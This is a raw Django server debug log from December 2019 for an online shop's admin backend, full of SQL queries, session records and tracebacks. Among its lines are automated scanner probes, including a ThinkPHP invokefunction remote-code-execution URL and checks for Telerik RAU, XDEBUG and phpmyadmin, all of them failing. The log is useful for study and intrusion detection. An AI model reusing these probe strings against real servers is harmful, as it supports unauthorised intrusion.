"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-26 05:56:11,844 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-26 05:56:11,849 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-26 05:56:11,854 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-26 05:56:11,858 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-26 05:56:11,863 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-26 05:56:11,867 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [26/Dec/2019 05:56:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [26/Dec/2019 06:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 06:00:53] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:10:25] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:15:28] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:20:31] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:20:33] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:21:51] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:27:33] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:32:36] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:37:39] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:42:42] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:47:45] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:52:47] "GET / HTTP/1.0" 302 0 [26/Dec/2019 06:58:52] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:05:02] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:15:24] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 07:20:27] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:25:29] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:30:32] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [26/Dec/2019 07:31:09] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [26/Dec/2019 07:31:11] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=202 HTTP/1.0" 404 6532 Not Found: /jyky/SendMail.asp [26/Dec/2019 07:31:15] "GET /jyky/SendMail.asp?ArticleID=343 HTTP/1.0" 404 6486 [26/Dec/2019 07:35:34] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:43:54] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:48:56] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:51:38] "GET / HTTP/1.0" 302 0 [26/Dec/2019 07:53:59] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:00:01] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:07:47] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:20:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:25:14] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:32:27] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:37:30] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:44:36] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:49:39] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:54:43] "GET / HTTP/1.0" 302 0 [26/Dec/2019 08:59:45] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:15:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:20:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:22:03] "GET / HTTP/1.0" 302 0 Not Found: /index.php [26/Dec/2019 09:27:16] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6564 [26/Dec/2019 09:27:16] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-26 09:27:16,603 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lkd77rsmkyk0hemgh4rp17tjwx5dcipt' LIMIT 1; args=('lkd77rsmkyk0hemgh4rp17tjwx5dcipt',) DEBUG 2019-12-26 09:27:16,604 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lkd77rsmkyk0hemgh4rp17tjwx5dcipt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T09:27:16.603724+00:00'::timestamptz); args=('lkd77rsmkyk0hemgh4rp17tjwx5dcipt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 9, 27, 16, 603724, tzinfo=)) [26/Dec/2019 09:27:16] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [26/Dec/2019 09:28:31] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:33:34] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:34:23] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:40:28] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:45:31] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:50:34] "GET / HTTP/1.0" 302 0 [26/Dec/2019 09:55:37] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [26/Dec/2019 10:13:43] "POST /editBlackAndWhiteList HTTP/1.0" 500 63896 [26/Dec/2019 10:15:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:16:09] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:22:18] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:27:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:33:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 10:38:23] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:45:35] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [26/Dec/2019 10:47:21] "GET /proxy.php HTTP/1.0" 404 6452 [26/Dec/2019 10:51:54] "GET / HTTP/1.0" 302 0 [26/Dec/2019 10:56:57] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:05:12] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:15:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:20:10] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:25:14] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:27:38] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 11:27:39,001 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0ac6n9564d7ue70q6pfen3iz8ziiyqzu' LIMIT 1; args=('0ac6n9564d7ue70q6pfen3iz8ziiyqzu',) DEBUG 2019-12-26 11:27:39,004 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0ac6n9564d7ue70q6pfen3iz8ziiyqzu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T11:27:39.002693+00:00'::timestamptz); args=('0ac6n9564d7ue70q6pfen3iz8ziiyqzu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 11, 27, 39, 2693, tzinfo=)) [26/Dec/2019 11:27:39] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 11:30:17] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [26/Dec/2019 11:32:12] "GET /favicon.ico HTTP/1.0" 404 6454 [26/Dec/2019 11:35:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:40:22] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:45:25] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:50:28] "GET / HTTP/1.0" 302 0 [26/Dec/2019 11:55:30] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:04:46] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:05:09] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:12:58] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:16:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:18:01] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:19:19] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:23:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:28:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:33:09] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:38:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:43:14] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:46:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 12:46:21,655 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'c3cronuyd5hg81w521rwgftay0z3ljei' LIMIT 1; args=('c3cronuyd5hg81w521rwgftay0z3ljei',) DEBUG 2019-12-26 12:46:21,658 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('c3cronuyd5hg81w521rwgftay0z3ljei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T12:46:21.656452+00:00'::timestamptz); args=('c3cronuyd5hg81w521rwgftay0z3ljei', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 12, 46, 21, 656452, tzinfo=)) [26/Dec/2019 12:46:21] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 12:51:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:52:10] "GET / HTTP/1.0" 302 0 [26/Dec/2019 12:56:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:12:36] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:20:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:25:14] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:30:17] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:35:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:38:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 13:40:22] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:45:25] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:50:28] "GET / HTTP/1.0" 302 0 [26/Dec/2019 13:56:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:12:23] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:18:23] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:25:42] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:30:45] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [26/Dec/2019 14:30:58] "POST /editBlackAndWhiteList HTTP/1.0" 500 63913 [26/Dec/2019 14:35:47] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:40:50] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:45:02] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 14:48:27] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:52:35] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:53:45] "GET / HTTP/1.0" 302 0 [26/Dec/2019 14:59:12] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:01:44] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:18:37] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:23:40] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [26/Dec/2019 15:24:28] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [26/Dec/2019 15:24:33] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=203 HTTP/1.0" 404 6532 Not Found: /newslist.asp [26/Dec/2019 15:24:40] "GET /newslist.asp?type=4&id=1374 HTTP/1.0" 404 6476 [26/Dec/2019 15:28:43] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:33:45] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:38:48] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:42:48] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:43:51] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:46:07] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:48:53] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:53:56] "GET / HTTP/1.0" 302 0 [26/Dec/2019 15:58:59] "GET / HTTP/1.0" 302 0 Not Found: /Telerik.Web.UI.WebResource.axd [26/Dec/2019 16:00:18] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0" 404 6519 [26/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 16:05:42,022 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'phpmyadmin'; args=('phpmyadmin',) Not Found: /phpmyadmin/ [26/Dec/2019 16:05:42] "GET /phpmyadmin/ HTTP/1.0" 404 1736 [26/Dec/2019 16:10:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:15:08] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:20:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:25:14] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:30:17] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:35:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:40:53] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:50:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 16:56:34] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:10:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:17:57] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:23:13] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:28:16] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:33:19] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:38:31] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:43:47] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:48:50] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:53:52] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:56:47] "GET / HTTP/1.0" 302 0 [26/Dec/2019 17:58:55] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [26/Dec/2019 18:09:37] "GET /robots.txt HTTP/1.0" 404 6451 [26/Dec/2019 18:09:43] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:10:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:15:36] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:24:56] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:29:59] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:35:02] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:40:04] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:45:23] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:50:26] "GET / HTTP/1.0" 302 0 [26/Dec/2019 18:55:29] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:00:30] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:10:04] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:15:07] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:20:09] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:26:27] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:35:38] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 19:40:41] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:46:49] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:51:09] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:51:52] "GET / HTTP/1.0" 302 0 [26/Dec/2019 19:56:55] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:02:04] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [26/Dec/2019 20:02:32] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [26/Dec/2019 20:02:32] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [26/Dec/2019 20:02:33] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [26/Dec/2019 20:02:33] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [26/Dec/2019 20:02:33] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [26/Dec/2019 20:02:34] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [26/Dec/2019 20:02:34] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [26/Dec/2019 20:02:35] "GET /index.php HTTP/1.0" 404 6447 [26/Dec/2019 20:02:35] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 20:02:36,082 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '464cnusgiolt0zl03mas31zb1xonudwj' LIMIT 1; args=('464cnusgiolt0zl03mas31zb1xonudwj',) DEBUG 2019-12-26 20:02:36,084 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('464cnusgiolt0zl03mas31zb1xonudwj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T20:02:36.083017+00:00'::timestamptz); args=('464cnusgiolt0zl03mas31zb1xonudwj', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 20, 2, 36, 83017, tzinfo=)) [26/Dec/2019 20:02:36] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 20:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 20:11:12] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:16:15] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:18:11] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:21:17] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:27:40] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 20:32:43] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:37:46] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:42:49] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:48:12] "GET / HTTP/1.0" 302 0 [26/Dec/2019 20:57:37] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:00:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 21:00:04,469 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tgytsdnha2q0tcdehs9eomcdc1g4oqfo' LIMIT 1; args=('tgytsdnha2q0tcdehs9eomcdc1g4oqfo',) DEBUG 2019-12-26 21:00:04,471 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tgytsdnha2q0tcdehs9eomcdc1g4oqfo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T21:00:04.469843+00:00'::timestamptz); args=('tgytsdnha2q0tcdehs9eomcdc1g4oqfo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 21, 0, 4, 469843, tzinfo=)) [26/Dec/2019 21:00:04] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 21:00:57] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:03:26] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:10:04] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [26/Dec/2019 21:10:09] "GET /proxy.php HTTP/1.0" 404 6456 [26/Dec/2019 21:13:25] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:16:59] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:22:02] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:29:09] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:34:12] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:39:14] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:44:17] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:49:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 21:49:12,445 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nbab0og4ay2d64yt1zwlj8qfdiedktdp' LIMIT 1; args=('nbab0og4ay2d64yt1zwlj8qfdiedktdp',) DEBUG 2019-12-26 21:49:12,449 utils 4252 140031503103744 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nbab0og4ay2d64yt1zwlj8qfdiedktdp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T21:49:12.446749+00:00'::timestamptz); args=('nbab0og4ay2d64yt1zwlj8qfdiedktdp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 21, 49, 12, 446749, tzinfo=)) [26/Dec/2019 21:49:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 21:49:20] "GET / HTTP/1.0" 302 0 [26/Dec/2019 21:54:41] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:00:01] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [26/Dec/2019 22:04:16] "POST /editBlackAndWhiteList HTTP/1.0" 500 63911 [26/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:10:55] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:16:06] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:21:09] "GET / 